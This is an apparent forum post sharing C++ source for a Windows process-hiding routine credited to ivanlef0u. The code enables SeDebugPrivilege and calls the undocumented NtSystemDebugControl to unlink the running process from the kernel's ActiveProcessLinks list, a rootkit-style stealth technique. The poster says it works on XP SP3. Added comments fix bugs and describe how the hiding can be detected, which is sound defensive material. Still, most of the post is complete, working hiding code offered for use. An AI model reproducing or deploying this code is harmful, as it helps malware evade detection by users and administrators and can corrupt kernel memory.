
in no way is this my code at all:


I simply added/modified 2 lines to make it work correctly under Dev-C++:


 


1) LONG (NTAPI *NtSystemDebugControl)(int,void*,DWORD,void*,DWORD,DWORD*);


2) *(DWORD*)&NtSystemDebugControl =(DWORD)GetProcAddress(LoadLibrary("ntdll"),"NtSystemDebugControl");



#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>
#include <shlwapi.h>
#include <iostream>
using namespace std;
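typedef LONG NTSTATUS;
// A preprocessor directive must start its own line; on the page it had been
// collapsed onto the end of the typedef above.
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)

//ivanlef0u's code
//xp sp2 ntoskrnl 5.1.2600; the hex numbers in the comments below give the
//size of the struct to pass as argument
//
// Control codes for the undocumented ntdll export NtSystemDebugControl.
// This listing only uses DebugSysReadVirtual and DebugSysWriteVirtual, which
// it calls from user mode with kernel addresses (see HideCurrentProcess).
// NOTE(review): later Windows releases are reported to refuse the
// read/write codes from user mode; confirm for the build being assessed.
typedef enum _DEBUG_CONTROL_CODE {
    DebugSysGetTraceInformation = 1,
    DebugSysSetInternalBreakpoint,   //0x38
    DebugSysSetSpecialCall,          //0x4
    DebugSysClerSpecialCalls,        //no args kill all special calls
    DebugSysQuerySpecialCalls,
    DebugSysBreakpointWithStatus,
    DebugSysGetVersion,              //0x28 //from the ReactOS sources (ntexapi.h), written by our favourite Alex Ionescu
    DebugSysReadVirtual = 8,         //0x10
    DebugSysWriteVirtual = 9,
    DebugSysReadPhysical = 10,
    DebugSysWritePhysical = 11,
    DebugSysReadControlSpace = 12,   //0x18
    DebugSysWriteControlSpace,       //0x18
    DebugSysReadIoSpace,             //0x20
    DebugSysSysWriteIoSpace,         //0x20
    DebugSysReadMsr,                 //0x10
    DebugSysWriteMsr,                //0x10
    DebugSysReadBusData,             //0x18
    DebugSysWriteBusData,            //0x18
    DebugSysCheckLowMemory,
} DEBUG_CONTROL_CODE;

// Argument block for the DebugSysReadVirtual / DebugSysWriteVirtual codes,
// as this listing uses it.
typedef struct _SYSDBG_VIRTUAL {
    PVOID Address;   // address to read from or write to (kernel addresses in this listing)
    PVOID Buffer;    // caller's buffer that receives or supplies the data
    ULONG Request;   // number of bytes requested
} SYSDBG_VIRTUAL, *PSYSDBG_VIRTUAL;

// Imported from ntdll; declared here but not called anywhere in this listing.
extern "C"
__declspec(dllimport)
ULONG
__stdcall
RtlNtStatusToDosError(
    NTSTATUS Status
);

// Hard-coded 32-bit kernel address; the offsets added to it further down are
// literals as well, so everything here is tied to one kernel layout.
#define PKPCR 0xffdff000 // <=> fs:[0] in KeLand

//FUNCTIONS:
// Global function pointer, resolved at run time with GetProcAddress in
// HideCurrentProcess. It stays NULL until that assignment has run.
LONG (NTAPI *NtSystemDebugControl)(int,void*,DWORD,void*,DWORD,DWORD*);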
//Check OS and get the right Offset:
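/*
 * Layout note: on the page this listing had lost its line breaks, so several
 * trailing "//" comments swallowed the statements that followed them (the
 * OSVERSIONINFO declaration, the XP "return 1", the WinMain signature and a
 * closing brace). The statements are restored below, one per line.
 */

/*
 * CheckOSVersion - choose the structure offset used by HideCurrentProcess.
 *
 * Offset: written only when the running OS is one of the three recognised
 *         NT versions (5.1, 5.0, 6.0); left untouched otherwise.
 * Returns 1 when a version matched, 0 when none matched or the query failed.
 *
 * NOTE(review): only the major/minor pair is checked, not the service pack
 * or build, and the 6.0 value equals the 5.0 one. Whether the 6.0 branch can
 * work at all is doubtful, as later releases are reported to refuse the
 * debug-control read/write codes from user mode; confirm before relying on it.
 */
int CheckOSVersion( int &Offset )
{
    //xWeasel's Code for checking OS's and setting the right Offset
    OSVERSIONINFO osvi;
    ZeroMemory(&osvi, sizeof(OSVERSIONINFO));
    osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);

    // A failed query is treated as "unsupported" explicitly. The original
    // relied on the zeroed struct not matching any branch.
    if(!GetVersionEx(&osvi))
    {
        return 0;
    }

    if(osvi.dwPlatformId != VER_PLATFORM_WIN32_NT)
    {
        return 0;
    }

    if(osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 1)
    {
        Offset = 0x88; //WinXP
        return 1;
    }
    if(osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 0)
    {
        Offset = 0xA0; //Win2000
        return 1;
    }
    if(osvi.dwMajorVersion == 6 && osvi.dwMinorVersion == 0)
    {
        Offset = 0xA0; //VISTA
        return 1;
    }

    return 0;
}

/*
 * EnablePrivilege - enable one named privilege in the current process token.
 *
 * Privilege: privilege name, e.g. "SeDebugPrivilege".
 * Returns 1 when the privilege is enabled, 0 on any failure.
 *
 * Fixes over the original:
 *  - the token handle is closed only when it was actually opened; the
 *    original jumped to CloseHandle() with an uninitialised handle when
 *    OpenProcessToken failed;
 *  - AdjustTokenPrivileges also returns TRUE when the token does not hold
 *    the privilege (last error ERROR_NOT_ALL_ASSIGNED), so the last error is
 *    checked as well;
 *  - the unused local LUID is gone.
 *
 * Defensive note: this can only switch on a privilege the token already
 * holds. Limiting which accounts are granted SeDebugPrivilege, and auditing
 * its use, removes the precondition the rest of this listing depends on.
 */
ULONG EnablePrivilege(char *Privilege)
{
    HANDLE hToken = NULL;
    TOKEN_PRIVILEGES TP;
    ULONG Ret = 0;

    if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
    {
        return 0;
    }

    if(LookupPrivilegeValue(NULL, Privilege, &TP.Privileges[0].Luid))
    {
        TP.PrivilegeCount = 1;
        TP.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

        if(AdjustTokenPrivileges(hToken, FALSE, &TP, 0, NULL, NULL)
           && GetLastError() == ERROR_SUCCESS)
        {
            Ret = 1;
        }
    }

    CloseHandle(hToken);
    return Ret;
}

/*
 * HideCurrentProcess - as written by the original author, removes the calling
 * process from the list it reaches through "ActiveProcessLinks".
 *
 * It resolves NtSystemDebugControl from ntdll, enables SeDebugPrivilege, and
 * then makes four 4-byte reads and two 4-byte writes of kernel addresses
 * through the DebugSysReadVirtual / DebugSysWriteVirtual control codes.
 *
 * Offset: offset of the list entry inside the process structure, as chosen
 *         by CheckOSVersion. Every other offset below is a literal.
 * Returns 1 when all six calls reported STATUS_SUCCESS, otherwise 0.
 *
 * Review notes (defensive):
 *  - The two writes change only the neighbours' link fields. The calling
 *    process's own structure, including its own list entry, is not modified
 *    by this code. Views of the system that do not come from walking this
 *    list should therefore still show the process, and comparing such views
 *    with the list walk is the usual detection approach (e.g. a list-walk
 *    plugin against a pool-scan plugin in a memory-forensics framework).
 *    TODO confirm against the tooling in use.
 *  - The writes take no kernel lock and the offsets are tied to one kernel
 *    layout. Presumably a mismatch or a concurrent list update corrupts
 *    kernel memory and can crash the machine; treat any host where this ran
 *    as unstable.
 *  - A user-mode process that enables SeDebugPrivilege and then calls
 *    NtSystemDebugControl with a read/write code is itself a strong signal
 *    for monitoring.
 */
int HideCurrentProcess( int Offset )
{
    *(DWORD*)&NtSystemDebugControl =(DWORD)GetProcAddress(LoadLibrary("ntdll"),"NtSystemDebugControl");
    // Fix: the original called through the pointer without checking that the
    // export was found.
    if(NtSystemDebugControl == NULL)
    {
        return 0;
    }

    ULONG Status, Addr, PrevEPROCESS, NextEPROCESS;
    SYSDBG_VIRTUAL Mem;

    if(!EnablePrivilege("SeDebugPrivilege"))
    {
        return 0;
    }

    /**************** CURRENT ETHREAD ****************/
    Mem.Address=(PVOID)(PKPCR+0x124); //KPRRCB-> +0x004 CurrentThread : Ptr32 _KTHREAD
    Mem.Buffer=&Addr;
    Mem.Request=sizeof(ULONG);
    Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
    if(Status!=STATUS_SUCCESS)
    {
        return 0;
    }

    /**************** CURRENT EPROCESS ****************/
    Mem.Address=(PVOID)(Addr+0x220); //ETHREAD-> +0x220 ThreadsProcess : Ptr32 _EPROCESS
    Mem.Buffer=&Addr; // Addr is reused: it now receives the process pointer
    Mem.Request=sizeof(ULONG);
    Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
    if(Status!=STATUS_SUCCESS)
    {
        return 0;
    }

    /**************** PREV EPROCESS ****************/
    Mem.Address=(PVOID)(Addr+0x8C); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY
    Mem.Buffer=&PrevEPROCESS;
    Mem.Request=sizeof(ULONG);
    Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
    if(Status!=STATUS_SUCCESS)
    {
        return 0;
    }

    /**************** NEXT EPROCESS ****************/
    Mem.Address=(PVOID)(Addr+Offset); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY
    Mem.Buffer=&NextEPROCESS;
    Mem.Request=sizeof(ULONG);
    Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
    if(Status!=STATUS_SUCCESS)
    {
        return 0;
    }

    /**************** PREV EPROCESS TO NEXT EPROCESS ****************/
    // First of the two kernel writes: the value read in the NEXT step is
    // stored at the address read in the PREV step.
    Mem.Address=(PVOID)(PrevEPROCESS); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY
    Mem.Buffer=&NextEPROCESS;
    Mem.Request=sizeof(ULONG);
    Status=NtSystemDebugControl(DebugSysWriteVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
    if(Status!=STATUS_SUCCESS)
    {
        return 0;
    }

    /**************** NEXT EPROCESS TO PREV EPROCESS ****************/
    // Second kernel write: the value read in the PREV step is stored 4 bytes
    // past the address read in the NEXT step. If this call fails, the first
    // write has already been applied and is not undone.
    Mem.Address=(PVOID)(NextEPROCESS+0x4); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY
    Mem.Buffer=&PrevEPROCESS;
    Mem.Request=sizeof(ULONG);
    Status=NtSystemDebugControl(DebugSysWriteVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
    if(Status!=STATUS_SUCCESS)
    {
        return 0;
    }

    return 1; //SUCCEEDED: both writes were accepted
}

//MAIN FUNCTION
/*
 * Demo entry point: shows a message box, and on a recognised OS version calls
 * HideCurrentProcess and shows a second message box before exiting.
 * The result of HideCurrentProcess is not checked, so the second box appears
 * whether or not the calls succeeded.
 */
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    MessageBox(NULL,"Starting Main Function","Welcome",MB_OK);//DEBUG

    int Offset = 0; // initialised here; CheckOSVersion writes it only on a match
    if ( CheckOSVersion(Offset) == 1)
    {
        HideCurrentProcess(Offset);//OK to hide
        MessageBox(NULL,"Check if I'm hidden now!! Press OK to exit","FOUND!",MB_OK); //DEBUG
    }

    return 0;
}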

the original idea was by a bad @ss hacker ivanlef0u 


http://www.ivanlef0u.tuxfamily.org/


 


--Currently works under SP3


Edited by JMC31337
